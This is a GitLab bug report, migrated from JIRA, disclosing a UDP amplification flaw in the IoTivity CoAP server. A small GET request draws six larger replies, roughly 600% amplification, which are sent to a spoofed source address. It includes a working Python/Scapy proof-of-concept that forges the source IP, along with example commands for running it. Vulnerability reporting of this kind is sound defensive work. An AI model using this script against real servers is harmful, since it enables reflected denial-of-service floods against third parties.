Skip to content

GitLab

I
iotivity-classic
Open
Opened by Rami Alshafi@ramiOwner

Traffic amplification of UDP packets

IoTivity server in current version (HEAD-5349dadc taken from github) can be used to perform Distributed Denial of Service attacks acting as network amplifier with spoofing of the source IP address.
After receiving CoAP GET message (53 bytes long) IoTivity server responds with 6 CoAP packets (each 62 bytes long)
###[ CoAP ]###

ver = 1L

type = CON

tkl = 0L

code = 4.01 Unauthorized

msg_id = 1881

token = ''

options = [('Uri-Path', 'test')]

paymark = ''

Together all response packets are 372 bytes, which gives 600% amplification factor (calculated as: size_of_output/size_of_input - 1).

Server responds to IP address from first packet without getting any concurrent response from client, so this request can be used for Distributed Denial of Service with spoofing source IP address.
Issue was tested and was reproduced for following examples IoTivity server applications:

  • devicediscoveryserver
  • fridgeserver
  • garageserver
  • groupserver
  • lightserver
  • presenceserver
  • roomserver
  • simpleclientserver
  • simpleserver
  • simpleserverHQ
    Issue can be reproduced using following Python2 script (requires Scapy library and sudo to spoof source IP address):

import sys

from scapy.all import *
IOTIVITY_PAYLOAD = "40010759b474657374"

data = IOTIVITY_PAYLOAD.decode('hex')

packet = IP(src=sys.argv[1], dst=sys.argv[3])/UDP(sport=int(sys.argv[2]), dport=5683)/Raw(data)

sr(packet, timeout=5, multi=1)

Execution of the script:
sudo python iotivity_test.py src_ip src_port dst_ip

(where: src_ip and src_port are IP and port of spoofed source client

dst_ip is IP of tested IoTivity server on port 5683)

e.g.:

sudo python iotivity_test.py 1.1.1.1 50000 192.168.0.101
For IoTivity example application started with following command on server with IP=192.168.0.101:

./simpleserver
CoAP responses will be sent to 1.1.1.1:50000.
 

JIRA migration meta data

  • JIRA Issue ID: IOT-3267
  • Reporter: cvereporting
  • Assignee: avolkov
  • Creator: cvereporting
  • Created at: 2019-02-15T08:13:08.000-0800
  • Found in Version: Current (HEAD-5349dadc)
  • Fix in Version: None
  • Issue Severity: Major
  • Reproducibility: Always (100%)
  • Operating System: None
  • Hardware/ OEM Platform: None
  • External URL: None
  • Bugzilla ID: None
  • Product: None
  • Status: Reopened
  • Components: Primitive Service
  • Priority: P2
  • Due Date: None
  • Issue Type: Bug
    END of JIRA migration meta data